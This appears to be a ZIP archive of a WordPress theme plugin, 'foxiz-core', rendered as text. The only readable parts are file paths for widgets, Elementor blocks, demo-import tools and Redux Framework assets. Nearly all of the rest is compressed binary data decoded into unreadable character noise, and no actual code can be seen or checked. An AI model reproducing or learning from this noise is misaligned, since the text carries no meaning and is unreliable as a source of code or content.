7VEF|4'hMl aIIiUp3"NSOqTƣ w5ۊe5VwF,}W@eo&DO?jr ]`m13lJKLĹ9R 6hn1]6wE r ž- ?P\yO3왣qZ@j| 33\tjM٘!ZXپ4 R}" ŢjTmC[:NP"H1nU/ k")u!Zܛ=CWXUO`= |@T}gCIo#!Z >q=@FjY bXF V/)E uO1|Ș?Ԩ7}. #gakLd.Ⓣ?ҡ5ӡ5PKo'5%A0!ư !W,`ák{\vqc Jjm.;S6IӢm)֗ 5A1c'eQI3z ϶^zΆ۫R|gaHBqΚIϑ3m"6Ҿҫה CTV0}9y.\yYmIף8o_ۈLݠ0}S^|7iWx0`җ :'w{u}!Ts5Ýl?ixj hTd5/ݽPKkTfoxiz-core/reaction/PK$AR@,q foxiz-core/reaction/reaction.jsWO0~GP0=0m y wE=&ׄG49K q a@"~)% uZ6̺#&XYCaG#[~BӹXOQT۽ {Ͳrsȁ$uXw 9c4S=)[OP~H^t& òeAVxV;> ;u{Qm.ܥgQ=Iw(vPJF$O6ӧyIfas*6FۅA\ 9D{9_MAeDŽZi'$:4#6T40R{v"!2!ggh_< `k2RsCTISz&vt v7Wlkm :w˪on;Qa`e`JQ1j b4UR/zKGY/RŮ='dhdd$짋/moM}N :J1!LPFaj~&8b 2C+Rb/Go*DSJ5D(DM<'IQ&DfIv ~"r"&e&\e{'jū*ׄh*O&bJիWfX,PV)ҨIIXUf(#w,'xFA7\#+\k&ahFzC5e*'L%020n8 dT"!ʤ`"-*yg(0\f)o|߇Y΃ːO6qjD9i׮5:t u9F![˽Ϗ`-A; 6pg rMw>[wtuץQ oIԙIq VL5ۤav}0Q^qs@I (^=6,炣ƪᔞ5.`P qcIZ?)!JS$lXӅ=U8.G8J†EIXM֓I}lX;T$:B ]H_O4*`o,Yrb,lX{+{no_g쉡Qb8lXb8/*$a#hYzmC>ɮW ,ko2DWfAgC_\tp#>hQ_P};Ȧ` rT T?>3wi.*SBPѸClQw[QH`zcgam]Y~_c\ʞIGS ~Q4dW;ZsuRkh!1fX_ a a]eh3;w#S_sBKd-jp}訏s蠝 VYMxжtB<JpfY;ys&UF kRnbtȓmlV[aט&1AIx[S(x!?}!f2 L4k})Og:E+z:z^-u˵ q>n q==L_8嵓KAkO So#װ:}U%ԼU6#ސqQ{>!FHv}Fl @?p'xvl|qEmjE.qzңz}T;}R`mW0@ PKTu3 T*#foxiz-core/widgets/fw-instagram.phpYo7Y؀dA4I3\P!琔 ƈM_C $9Q_!@GϧOO>Q*Wx_28^0#"9 'y\Wg/<aP2z9A% f o.ݵD| zS+Ņ""GaV?<2|IGn %1a!9+* }¢"IIr}7NfW&ըPٴU?X?m4K3]?I>SmP& HȆ9@0Mq~7DKFp2Y<GE6&b=Xuǐu("U5MEʠ`!t炵BE83[Uޯ-[@Ә{AER(ۃ7vwcZ7};FM J``;ugWE6}Dh1 _(![UѯbwoF{oxtAߚTk5?t4_F0%倈^s2o{#%=>Wc'wƟ U([e~gm̳0_1_s]R#כ# &051{o\rA* )%gL/P3Cp!BC h,H, ["&eJA!^JD]NoZ5lV 9$gz斄IVG܃VITRf{ic뛦bD,Jl֊) vhM?%c({ӦF==.V=}1k zu.Rq//ՙ/k`F@Q1ϰ# i_ZYmG7Y:} zqp8V)4n6$|ZAy%9jy~5$17 yL, j#Ud.c֑ɵT\"菂 { sؒ~tXC7P*RsSA>} d<+T >9 /XW7ZpBk J+@y֨PKs{ݭIG5FS=5R?Gd&l 6\J< OvP\9RtI>`] oŃ  b$ (hym4ϽЕP.H*IڀW>QQz1,+,R c1ޓ 殅w~*:Ϯmz@Fwg '5ьf˷~on?ۗn#QaER5ZTǗ64 +m踇[k2Ŋ H}52֦$$<;it.h, U$1 ގL֬-xTdw? pzo\{t dt#wyn+դۯ bWHyT$5`%=(yE!f.3:#2\oɅ{,1cd︔ws{+$h9lwF%ύgZ\ƕ<ԛp, x*Tll6{įQ-H&s:L:U DJx[Hv5tdD|^Ș!g4>R0RprN NBu'6^*'&y/)-{_iF`Dm87:$Xұf:0Oc:䋓9WTEngZk.䞄EE3d<xBSֺ+A2W;ʬgJc`sqj.o.QE^55ʽFIq(!SNgIB7&Cn{hpM{nۑIHKtM-OI:ke-RM.-VײKYf֚|9xh1˳dm/Uo#(CbK5:VpM(ӓZݚ@Yo˻i {t@i_hYրY̞dGxnXF W&35[}cj*̸qK^dѾ8Mhwna0m7&PKT5̗ $foxiz-core/widgets/ruby-template.phpVmO0J7T)`bbY&PKP&ΛؐT=w=u9 fRX@tW1M',j6}M40:0PYvYo5nʜ[xn9:> ތ| v#ZL9RG0/E>3:K+eJ,0X]v8]K<فGŤ(iN̺6-FIܠN *{tBv&g((s˴Є'=oFv!0AHZ?L۩A*Aϡ9k꽼P^ $J1yOwUV1*\QdnQ=G4Y2b {e=O^\z󮯡h*kGW!wTp%|AfI,qlG ~/5RbRI6:?uOZpVʭGs]h6 ]Xgm+mZDN8+s90-@4^$ﹹH\7`%ko]`ͅނV)4\u9Zƹ*+:iGkz;0ϡxDiPŐ?mȧOd߹NȻΓpOZH͋Zx<)hGa*(?7 )"8/x]{G_zPK5T_?w7!foxiz-core/widgets/sb-address.phpXOH~DJ^JHz9>j1@H&_'ҫ AoFB PЃR' -O@kz˃E4e90 d ,dg{QN|ӄP꧉ڗif4F%y^|w('ֽ4֬)Ӄ,dGrC:xK#WXeyb͹i}:ݒprZҮ3iϟ..zEKAn9-:S6Oo 'Ҽx;1ѹB}ڴD Zo ʂD\@D}gy[1Cʔ@pg»RbZ|\ 桸cC+~H¦f5|igF^Ɗ Cgmb47 N;vnZ(˥s Բj[9NdЁ pXXۄ^FU:Q: @fCVKM61:B@xWQ*œA7u]]3F U5mߵPKٞ5Tp3 "foxiz-core/widgets/sb-ad-image.phpVYkH~v 6d'e02!4=Rܬ.[9fCZ=d 3 :.7D氀_@`.+ H6}GKdOҬOO^NOvYft&'m)=&+y8'Nb!',=닄g xRy\GN="[*3QmflnRW#7hi L?W:c[SQ)l*#5XH)$YHm fj#+nQ$Lt'i?\˺25#|h:ZV1bG>R52W%(c'}.G) W\KVAjSAV`_z*W(m#8 $nx u!vWUNjT,An\ F (4a{jm8*1yh#؛pŅNQQ<(Rt<[o։ܑM+iWd: jN1x 4 nRAˁaćh<q52b E Dl vfum)y{4ǵ|h8$8>oݠ>h*"i_7b7g vaXMݣt7U?8$;иp/m Q:@lߏ{u&4Z s]y6( JԀawJNx@φwHn$"q ar?rc;_}w5Thb^zMpHb3xoxsO e2=ws\ln_ຓ~ڗ 'IG!xRW^f\OKvRQ\zw LTC}8L(.ٌ ڙh}?(۶zh=-I4V(*tي")W,VFfgcAq>`Csp}QXR\[a<$3=)[Y4! . DNx`[USa{ȌdwXM]^p!US;OtY}[K0PD$lJ7uJr),]oY"lm= ~E=)mRK3؜:PHili,@~T#aW!W*MPaDWY}doEk UO]~ BIzˑ8oŚ\>q'RE3^2ڡ[:M/"Gm-GOڵf@ ;pɶ9F!CoxC"yx$A4hX6\d&3ˋ).=C1\+HF6{h46إA,⸙ȘNx>gPS!Oo׎Ve?t0ѼIz1 nJ'KxkҘ qqdHMg?ph97, )խQY2E*hkPN>d~a21=.F$ bEvT8 &0 Vux-,W#|u Ebmx7:-h9scFp  Ӊ{8X{-Zk'$D 9j{`rkf֥ pk֯dhaUAV2_ ۴ZL~^;E+nU2JqwЊb&ɖQ:$mUB Z=9gNõǾ/B}3k Ms+ tigZ@ٯV, jH@ʄgl9% eI+P23GMXQ,`4'T"QCWY J̝'_oME  6'ǒf ^c];FLT G2|%^j7L n+k`} '%[X,X-ZmH]K~Ξ/[ &/FΨt Ϸa~!-[?Q~׊Њsub ,|},/\SnG!5<]r1r?~u߭c`q3cS2'/G)dyؑ9eYwQ4:7[Tv xLt=oKpcIJ!$D"M>yxdP-',qVoMa$Q -}apaU&=jiψȜ0F]>+ppaF:y"w8ݒڶZR\Ns* ȳhEI mf'>F/9u`}@+#]k?D1"!>D5ڤ܅6)>6KIq+ Hէf4];$wCpB/lJ'U~wz7i}I+<#N/p~慎Y00gr@i\dC$ḊMs]/^k?=! jk^^Ł^A`_Iit_x>w0t >A Ozl„$螊 6fxLӣ>'4"IJ2a/RKHhA͵}twm仟Co#߿l.y`ˎ6ۻܿ_ke4DTuʂCDo |CeDJS`VRVX>7XCRsW3|д)NP :>(̔4XG5˸sX1Ϧ.-S +-Ύ|Ӯ:8-ަ$f+040'5@g=c b+Ɓ6xqxF0l+-wqGGV5jy WH].䤊hgtH:tז r Bl8w3P\NEKg0s9)W<1!sW*[kz}sj"nV\]e@4Z/B4s,oNo tul+ü@my51]5f:ߵ>Kho,lU9P'͞झm[eDɞ6=M505ukeKG/5Gꛯ;#P$ttU3<#3ұ܈^B5 R fS6&}V$|Vn Qހtsfw^4n eqit?/$*izѾwh0V@kTЁrLU^N:>7G%#:\,ʮOkfF*8|qͪr[T5y0H*1['C67 f}`Q{j?PK\PuTlxShz,"foxiz-core/widgets/sb-follower.phpZmo6"l7i;t-`n A )C"}ED+S4}CoX-V{tC 2Cp9={/Fd~CsWr{atCbg s/D q,P`s\ƓUL=A`ޒ[ػN*QڝyI6j8bQ'lsK9Tu؋KF2;JSLP5tt$j(\%EvTp$NF36_w$( rHzzIπs#dwCa+5F~4xȁ<_9K/+NQס.]:5I9La1A(,eIu{x{n}g*QÛ/xjxf9 Ճ][AfAJ PKTz $#foxiz-core/widgets/sb-instagram.phpioF?LU!r`-euhѠn>1"Gyafh[iEl*p 7ه*^tC Ђ$(/ ! yׯ8ÜGO}. . y0GqxEzx<R$}} R"O*F hVah0cx{pxA9=6zjn- Eq @VʚDJyRI HrRȌDyK@5PQ E47}`\fz6%8KmShGtu;QYܬt-#{(' @-P*0c4t ߵuJosHY4O!.Godч]CM L^:NVxFceVniHF'^J SΠD@e ,~X5]}ZKLVEHֲL@YYh^E$kdʔNNm僫7a3v\jSGdK4ffF(ˊܨ _"5' Ų-hOOћ7=w|ǟ?MaќhB/k3(YNE^ve.)ZhLlk뙡!Jf9T<"<U%ձagPhKq?*RBoR_g|;"r0v!71wVB yFouP^g(T8h{&Q?aJ0g Smsx[uVOTbYXzp>Ŕ^yv΃1Z2G{{ɰFl܆찆qW}n=$5 ؁zL`=Ckms'i^mCiysǐ q=˽Fz$0̄iХ$v/ N@n 㛽_A" oj?p)vy96+\WIohVqxhu#W0rý诿@&gw|?~KpZU= GFP { q?Y, UzU]djK2WeWXΎ+RK= F}cα#5ϼ`$Z \xqF7[ ԻbJМ07Ko5Ё$ kca^[p-ϷDZXͱP^QB$΁c5DQrGul}՚験3%\){Uێ3+Нd?3UUϲU0$m?_ X!kF x?hq?^u)rXi[;KiKl,]C_'JG5l*is;u7K} i@kLA#qIufD9T%{_W̲74OCG}aJ81[RyԎZJJuj>I.-A&H2,}1R&2z.$!{КL06wO9zopp4ޕz_[T2BC!e$Ku_Kkv`p PK[jTe_ Ob#foxiz-core/widgets/sb-post.phpZo6Eـ1`@dHf+֡A@%&*KH9q;>GEQWx]zX0BAA% iJVqmN1;uG'R2"_8㈋4p9ӆ 4p!u99qͺý^BfP\h,NW5fQt 2uu/Ǣni.Ij4$ aFVwŦμ : |4&+Xd`IHKޝs8{YР\2bm'@#xp_옮GLFc[jtpfG -BkА"s|y"w {? `!ʽJyg5J-^T7|Yv¦Tm9V̛Jgo/cc8Æy< N ۶c8K=~ӼYr.IV V>L-tMդ>WXSj[k7FUE.%n.\&q c;0GQ=l&u iCC^[kTYt[㽾X[wWMYP_:h[ ?΢LF3%&mEZIb]r.I8ο|d\ݎ ~Y#_ĉ%MMq5U)͒G})VI+:ϵ$ >> 2]V)Z:E~DxyܑM" 9P|zrx>߾JӑJY k LKVwEs" ED6nE^z긠Yל 5URү9]E޺XZ=3Dغi1oA>hse 6FDĐȩV!dh0&!>K7*ui?3E,Ԑ?2թt2wDu%JT}3.(@ڠ^ϲ/C[d%uuue r ƐIuT<\0=k.. Hk%* ԖvjQaͤfھo5N{ݎv5B!aۜ )YmJTvL{:HM"-?Ie;kqb|{#'}d"g_P1rYp_8ԕSkn IuxVUMHRÜL7``+ $KW[|<n16#駧d1rǧs<#VܲD>D5;6G&TŸ(ԠFPKTt!*k.%foxiz-core/widgets/sb-social-icon.phpZk۶laT6`o1(Em4(-6$""%ѻ\TXkΙ31Տ~ }r%g(yw$h{bBR~ŷ/tV`Rh`+'VE!dָ`DjyZ$ H"2g˧ 7 =`Nд 1tpl~%{hO%T8re)KSfܘLMǒl$$H\aZ3CN1aB˂r+k[JrL9^p6Oצ!N5qFVU#4P70n㽖$倝nUh3~˺` {8^$ۖ݉@vϩjeUT:(n6ƁNKCW߷j_YQr;R iHS>Ãߍ()a- c:"zO`Dp|Hv9 DXnHSht6DWoWsHd-Y@ ?_dxGtLjCkrl{N}Ks. aDuLj gЈ *JH%:sľ#'2kʌ,д*r/j'9+fFD:3Ҥ.þ\BU.yS*4z7Jg2aovR>O!"&XojI`qE:34.U HaNהX"7}PW>vN]ơ0(1f!NR5@=޸?MHKSs;M7׽3 jMkwY0Kgq]>&v[5hb=Y藻>"\ՑO 8;;΄E/ݠ Kcݰ-D4P*92Id4I#btu:BQ_[p/=TGatwK[}j* td=U"ڨ\7Npw[kw|-t}Unn<A/^ilFϰ3^>L#oǘGe|?jR] @1n6>=FcB-%OXs`? `D#Z7N""C@ >VƍA[(Z2>ƸM)}\U0O]kUr7(tlђ̭q@_d<kc\>/JxB˵T\.ƻ|}f7]WmŸl/j$ݸ/.(iyϙagk!{Ь#zHV{ƢtET=#D5KhJTq>Z\ YӯWUi͖D"f.}qla p ~/P"5!MHԘ:ot&sƀ2#u10x Y?W9=t߫Ҳ[WB+<7ꁝkW:$ 1c`P%UcWb F(?9ɪ$3󄝹t|yx|Hu+AlӠ219pvǣeck`od_ f[-t^HJEjU̻>흈AR@wV=h[7T}DM[qrtql,kKwV۪ -y@jvL@uGSv՞:'@X3Շ3å30|spꡟvo C[B55Od(|PK5TYx /foxiz-core/widgets/sb-tweet.phpZ{s۸[w@)9z8LjQ7כf^2wҞ@$dH Yqbw ŧDɱLKؖ q0>a3BϐCg̣N gO&jϗOO=}P." '?㜆f͈Q)$HrBG\R.u#55E!iO3+G7] 8UfKƶE<\ڼՎ4|΢(E5LθKM~#D#Ÿel8:_Q#؜ R݉({2ӌGsş0Op_ћ"s2Q;̎ۦ!_QȫGch[cXON! Y }' E:4,s# kd( Y iB̡̋Sj# 786bs" &* ʷ\.-]aϦ]'I&+^L&ؼf#X<eU!$2kIř,V675^Ğ;Dk.ڶ I2g)Pxƨ Į5ikns,`"ŚB=q4J!2'0xcu jIV|L :P Osu4 dZMK|ow9=377A? E[Y[B(xyҋ82oDb H) S0(q!rZt-@9KB`! 9At;-O 2Y򡁧. aOFf-.dg+kaF?]/CXqk?^ AA5mWwFdgK=~Lα*]?3;<xw<\T֞rV"'W]S*icsVaߴ2mWڋLj_A}L&Xa%c%L& C?Ν>v^# poܻF y4)CVʪTAƜk@he䚉t#1ov̦s:tG"PPق\R ],%Bƣ~gxlq_MqP|>4^0)sMErЇCWah9nDF`ςA_~T_bt۔zr6iAx`WI4lwa@sHxS|4scH|]_4|y#&%xjw+ʧVՔЀ+Li\Se*S/VuhoqFH]blܚ1VN:thF0"Hޖg`\~V]Ef5I`}C5m]'V_X+ܳV/ry}w+xxgö53؆%h VHe/F'k~Ǿ3iqZ.Jjq7ҸGY#I'CFơa.%ߺzV:F֗[5yyײV[k,n6Y Hz}QoqOϛ©h?"\g@f alA[ z`RiܰF-$yۨ%v~xhi/(X}2ZKlw| $Zk=eO5J [%l~*v:zkNoK%K>o qjCy\CI^!l'w 6A]-tQCٶU0+{oB=.Bqa MW| Xb8Bu;}i<9`7dDw  ↁ|Zh6ԃnUgTW$br a"^__BK?̎)fMijBX5ˁ-5Հ[So̶-0}ZC'v@K:|ɷ #[`gcr^7`ڲLn]̞k?dS\P.cXrޏ=r?um^0Lo}ҳH{Y8=SgXóa`85}y"J 6R9*dǧ]82<32!HoTb@p!foxiz-core/widgets/sb-weather.phpW[O8~,[VE /:b@]iLeiI(v:+8NZ`/K|ss|1ZF{‡>Br. ß=^@"BU$~;rǩ^Oō`ġ&Isݐ;\Pډbjt hu0>%ѣu`)iJ q 7RѬf,9:.䯳ExV$=wKbF|\Ae-BbcQ kI׎F\ꓓͨ'e\ydW!y`6e <4Vs`&]۰b M"Rb[s* t!L:73PPnf逌ϵZ'Cz`B$$CLJ V^)%1D@3Ks#Px۠or7h,ynWU:FSo p* fj /}+9T'~rq_7zl iI7Yߌ+,% iN2RV"pY0*,N g '}|Ԃyid`@eݬ;U<ֈlz[csW#whq/)EK~w>3+ut^]*~<Nڸ? Si ]ۮ͹oXH7ozvrX9mWѮ)(n^N bA)CldI&Fu6+I}Ne!KgPKr5T¤ !foxiz-core/widgets/sb-youtube.phpVYkH~v de 0Ӵ݃ݭ8%}ɒme&CXX]W_]|__57Hp-$&}>~_ 3zkBM*f/;{d_+dJJ0šUŠL4<~a"٠H+ B/4́+qwJ>G$zCBFd3*bn:=z8:&g(x˥ĔI#W"ZCP:$Hʈ:f[K+) Ny8Se0l2Q:0nX\nr4?݋W\S~h,]%t`t g|._OT g2!4~1BBYFYQK\ȵH *L\BS( Q&426T}qB<+-`Wj)EEx '3O gC"M!{F?|E'w4Kɦet}xy'O y~ w9/LtX)5n12.R6ۑ4دnpfx߼[5+wdg7*wf2MmRnMOhs0el*#5T>@k̮(pcQ. Z\K+0/RS Y;$`$=|*)G5X:e"SR[{PKkTfoxiz-core/admin/PKkT/foxiz-core/admin/assets/PK™T89Z! efoxiz-core/admin/assets/panel.cssPKT: ^ N  mfoxiz-core/admin/assets/panel.jsPK;kTU]') foxiz-core/admin/assets/theme-options.cssPKkTT~G '% :foxiz-core/admin/core.phpPK)R|2z! +Dfoxiz-core/admin/core-helpers.phpPKkTWFfoxiz-core/admin/fonts/PK'T,{2  Ffoxiz-core/admin/fonts/fonts.phpPKT)0 Ifoxiz-core/admin/fonts/init.phpPKuYTiZmB# iQfoxiz-core/admin/fonts/template.phpPKkTWfoxiz-core/admin/import/PKYuTE˩a /  MWfoxiz-core/admin/import/ajax.phpPKkTafoxiz-core/admin/import/demos/PK`mQ`d' (bfoxiz-core/admin/import/demos/index.phpPKKwT68" bfoxiz-core/admin/import/import.phpPKAuT b  rgfoxiz-core/admin/import/init.phpPKkTifoxiz-core/admin/import/lib/PKjT^ Њ2~/ ifoxiz-core/admin/import/lib/class-wp-import.phpPKruTR)i& ќfoxiz-core/admin/import/lib/compat.phpPKruT_͜E' ~foxiz-core/admin/import/lib/parsers.phpPKkT$foxiz-core/admin/import/lib/parsers/PKruTQY8 foxiz-core/admin/import/lib/parsers/class-wxr-parser.phpPKruT93 )> )foxiz-core/admin/import/lib/parsers/class-wxr-parser-regex.phpPKduT.RB foxiz-core/admin/import/lib/parsers/class-wxr-parser-simplexml.phpPKruTux"< foxiz-core/admin/import/lib/parsers/class-wxr-parser-xml.phpPKuT>2 foxiz-core/admin/import/lib/wordpress-importer.phpPK\wTo&! qfoxiz-core/admin/import/parts.phpPKuT@I+ @foxiz-core/admin/import/radium-importer.phpPKkT!!$ afoxiz-core/admin/import/template.phpPK|Rj foxiz-core/admin/includes.phpPKkTfoxiz-core/admin/rb-meta/PKkT foxiz-core/admin/rb-meta/assets/PK/OTIu F( ,foxiz-core/admin/rb-meta/assets/meta.cssPKsBT3z 5' foxiz-core/admin/rb-meta/assets/meta.jsPKT;|$ foxiz-core/admin/rb-meta/rb-meta.phpPK\Q,ĉ, o foxiz-core/admin/sub-pages.phpPKkT= foxiz-core/admin/system-info/PKASDRJ, x foxiz-core/admin/system-info/system-info.phpPK8YTYf ) hfoxiz-core/admin/system-info/template.phpPKTP`E foxiz-core/admin/taxonomy.phpPKkTT&foxiz-core/admin/templates/PKh_wTj$ &foxiz-core/admin/templates/links.phpPKkYTI b- 'foxiz-core/admin/templates/template-panel.phpPKAS!0 --foxiz-core/admin/templates/validate-redirect.phpPKkT/foxiz-core/admin/tops/PKASVl R/foxiz-core/admin/tops/tops.phpPKkTW1foxiz-core/admin/translation/PK@zSP:nB ) 1foxiz-core/admin/translation/template.phpPKyS , 4foxiz-core/admin/translation/translation.phpPKkT9foxiz-core/assets/PKdiT't" 9foxiz-core/assets/admin-screen.cssPKvrT >foxiz-core/assets/core.cssPKFaT@Ք  >foxiz-core/assets/core.jsPK]eT/:5 Efoxiz-core/define.phpPKkTFfoxiz-core/elementor/PK45TAoY^! Ffoxiz-core/elementor/ad-image.phpPKZTb* " Kfoxiz-core/elementor/ad-script.phpPK[T X Ofoxiz-core/elementor/banner.phpPKNTc Ufoxiz-core/elementor/base.phpPKZT߈6(& Zfoxiz-core/elementor/breaking-news.phpPKIXT_֤UZ'% afoxiz-core/elementor/categories-1.phpPKXT疖8%% Vifoxiz-core/elementor/categories-2.phpPKXTqc(% pfoxiz-core/elementor/categories-3.phpPKXTo="$% wxfoxiz-core/elementor/categories-4.phpPKZT% Ofoxiz-core/elementor/font-resizer.phpPKVT2pP W{ afoxiz-core/elementor/grid-1.phpPKXOTI F{ sfoxiz-core/elementor/grid-2.phpPKpOT/`_# {foxiz-core/elementor/grid-box-1.phpPK$PT_# foxiz-core/elementor/grid-box-2.phpPK$PT/#|% foxiz-core/elementor/grid-small-1.phpPK$]T0̟m_+  foxiz-core/elementor/heading.phpPK3WTjWi N' foxiz-core/elementor/hierarchical-1.phpPKZT™ s H' hfoxiz-core/elementor/hierarchical-2.phpPKzWT* 9H' [foxiz-core/elementor/hierarchical-3.phpPKjTq7o l I&foxiz-core/elementor/list-1.phpPKjTӸ l 3foxiz-core/elementor/list-2.phpPKjT "s# @foxiz-core/elementor/list-box-1.phpPKjT}y4 "s# Nfoxiz-core/elementor/list-box-2.phpPK/T- TX% w\foxiz-core/elementor/list-small-1.phpPKjTc Yr% gfoxiz-core/elementor/list-small-2.phpPKjToG} l% ufoxiz-core/elementor/list-small-3.phpPKeTʇ+# foxiz-core/elementor/login-icon.phpPKheT9SxA ffoxiz-core/elementor/logo.phpPK\TLQ Sfoxiz-core/elementor/menu.phpPKNT3Cku" ڔfoxiz-core/elementor/mini-cart.phpPKT@(3# foxiz-core/elementor/navigation.phpPKZT$U% foxiz-core/elementor/newsletter-1.phpPKZT.6% lfoxiz-core/elementor/newsletter-2.phpPKZTGE% foxiz-core/elementor/newsletter-3.phpPKfT|* ffoxiz-core/elementor/notification-icon.phpPKrQTyk `" ?foxiz-core/elementor/overlay-1.phpPK$PTu+uv" foxiz-core/elementor/overlay-2.phpPKZTس0 Vfoxiz-core/elementor/plan.phpPKZTËl$ wfoxiz-core/elementor/quick-links.phpPKXTl$ %foxiz-core/elementor/search-icon.phpPKaXTAf  <foxiz-core/elementor/section.phpPK]T46h'( vfoxiz-core/elementor/social-follower.phpPKfT~=;$ foxiz-core/elementor/social-list.phpPK VTHP " !foxiz-core/elementor/templates.phpPKZTMr foxiz-core/elementor/videos.phpPKZT,  foxiz-core/elementor/weather.phpPKkT=foxiz-core/e-template/PKThMږ<" qfoxiz-core/e-template/init.phpPKR҅  Cfoxiz-core/e-template/single.phpPKQT foxiz-core/foxiz-core.phpPK(UT foxiz-core/include-files.phpPKkTfoxiz-core/includes/PKTzd $ foxiz-core/includes/actions.phpPKT9.f$ / $foxiz-core/includes/ads.phpPKTeCKa .foxiz-core/includes/amp.phpPK'T?kB 5foxiz-core/includes/extras.phpPKˍTe}O O<foxiz-core/includes/helpers.phpPKhT+`7$ Nfoxiz-core/includes/login-screen.phpPKT/tcexRU Vfoxiz-core/lib/redux-framework/assets/css/vendor/elusive-icons/scss/elusive-icons.cssPKYRQ 6Y afoxiz-core/lib/redux-framework/assets/css/vendor/elusive-icons/scss/elusive-icons.css.mapPKYR^6V foxiz-core/lib/redux-framework/assets/css/vendor/elusive-icons/scss/elusive-icons.scssPKkTEfoxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/PKkTLdfoxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/PKYRdfj βfoxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_flat_0_aaaaaa_40x100.pngPKYR;\wxk foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_glass_55_fbf9ee_1x400.pngPKYRgik foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_glass_65_ffffff_1x400.pngPKYRۇmok foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_glass_75_dadada_1x400.pngPKYR-nlnk foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_glass_75_e6e6e6_1x400.pngPKYRalikk foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_glass_75_ffffff_1x400.pngPKYR,XIbet foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_highlight-soft_75_cccccc_1x100.pngPKYRDž{{p }foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-bg_inset-soft_95_fef1ec_1x100.pngPKYR7,g foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_222222_256x240.pngPKYR|8+g 7foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_2e83ff_256x240.pngPKYR5+g foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_454545_256x240.pngPKYR+g foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_888888_256x240.pngPKYRw+g Gfoxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_cd0a0a_256x240.pngPKYRbWq!"g foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_f6cf3b_256x240.pngPKYR\+g A0 foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/images/ui-icons_ffffff_256x240.pngPKYRL"#PF` @ foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/jquery-ui-1.10.0.custom.cssPKYRxI2 Ed d foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/jquery-ui-1.10.0.custom.css.mapPKYRl |a Eq foxiz-core/lib/redux-framework/assets/css/vendor/jquery-ui-bootstrap/jquery-ui-1.10.0.custom.scssPKkT6e foxiz-core/lib/redux-framework/assets/css/vendor/qtip/PKYR6#E foxiz-core/lib/redux-framework/assets/css/vendor/qtip/jquery.qtip.cssPKYRI#.I foxiz-core/lib/redux-framework/assets/css/vendor/qtip/jquery.qtip.css.mapPKYRRe#I Ҙ foxiz-core/lib/redux-framework/assets/css/vendor/qtip/jquery.qtip.min.cssPKYR#], x3F foxiz-core/lib/redux-framework/assets/css/vendor/qtip/jquery.qtip.scssPKkT: foxiz-core/lib/redux-framework/assets/css/vendor/spectrum/PKYRUxz K-L A foxiz-core/lib/redux-framework/assets/css/vendor/spectrum/redux-spectrum.cssPKYR)jP % foxiz-core/lib/redux-framework/assets/css/vendor/spectrum/redux-spectrum.css.mapPKYRTs/;M W foxiz-core/lib/redux-framework/assets/css/vendor/spectrum/redux-spectrum.scssPKkT*5 foxiz-core/lib/redux-framework/assets/img/PKYRH:y0 } foxiz-core/lib/redux-framework/assets/img/1c.pngPKYRO O 2 D foxiz-core/lib/redux-framework/assets/img/1col.pngPKYRlf 1 foxiz-core/lib/redux-framework/assets/img/2cl.pngPKYR u= foxiz-core/lib/redux-framework/assets/img/2-col-portfolio.pngPKYRus 1 foxiz-core/lib/redux-framework/assets/img/2cr.pngPKYRE foxiz-core/lib/redux-framework/assets/js/vendor/PKYRx҅* 9 foxiz-core/lib/redux-framework/assets/js/vendor/cookie.jsPKYR8Kpb [B foxiz-core/lib/redux-framework/assets/js/vendor/jquery.alphanum.jsPKYR_  zG foxiz-core/lib/redux-framework/assets/js/vendor/jquery.serializeForm.jsPKYRϖb24 C = foxiz-core/lib/redux-framework/assets/js/vendor/jquery.typewatch.jsPKYRZ*M*; foxiz-core/lib/redux-framework/assets/js/vendor/jsonview.jsPKYR6^$? ? foxiz-core/lib/redux-framework/assets/js/vendor/jsonview.min.jsPKYR&@p :': ] foxiz-core/lib/redux-framework/assets/js/vendor/lte-ie7.jsPKkT5% foxiz-core/lib/redux-framework/assets/js/vendor/qtip/PKYRivL,C x foxiz-core/lib/redux-framework/assets/js/vendor/qtip/jquery.qtip.jsPKYR}iO? G b{ foxiz-core/lib/redux-framework/assets/js/vendor/qtip/jquery.qtip.min.jsPKYR3wI  foxiz-core/lib/redux-framework/assets/js/vendor/redux.select2.sortable.jsPKYR&7cM foxiz-core/lib/redux-framework/assets/js/vendor/redux.select2.sortable.min.jsPKkT9c foxiz-core/lib/redux-framework/assets/js/vendor/spectrum/PKYRpAiJ foxiz-core/lib/redux-framework/assets/js/vendor/spectrum/redux-spectrum.jsPKYRřU#]N  foxiz-core/lib/redux-framework/assets/js/vendor/spectrum/redux-spectrum.min.jsPKkT$* foxiz-core/lib/redux-framework/core/PKReR1 + foxiz-core/lib/redux-framework/core/dashboard.phpPKYR=! [/ - foxiz-core/lib/redux-framework/core/enqueue.phpPKYR*B_+1 : foxiz-core/lib/redux-framework/core/newsflash.phpPKYR1y 9- M@ foxiz-core/lib/redux-framework/core/panel.phpPKYR0 K foxiz-core/lib/redux-framework/core/required.phpPKBjT,/a2, L foxiz-core/lib/redux-framework/framework.phpPKkT# foxiz-core/lib/redux-framework/inc/PKYRnPS. foxiz-core/lib/redux-framework/inc/browser.phpPKYR8 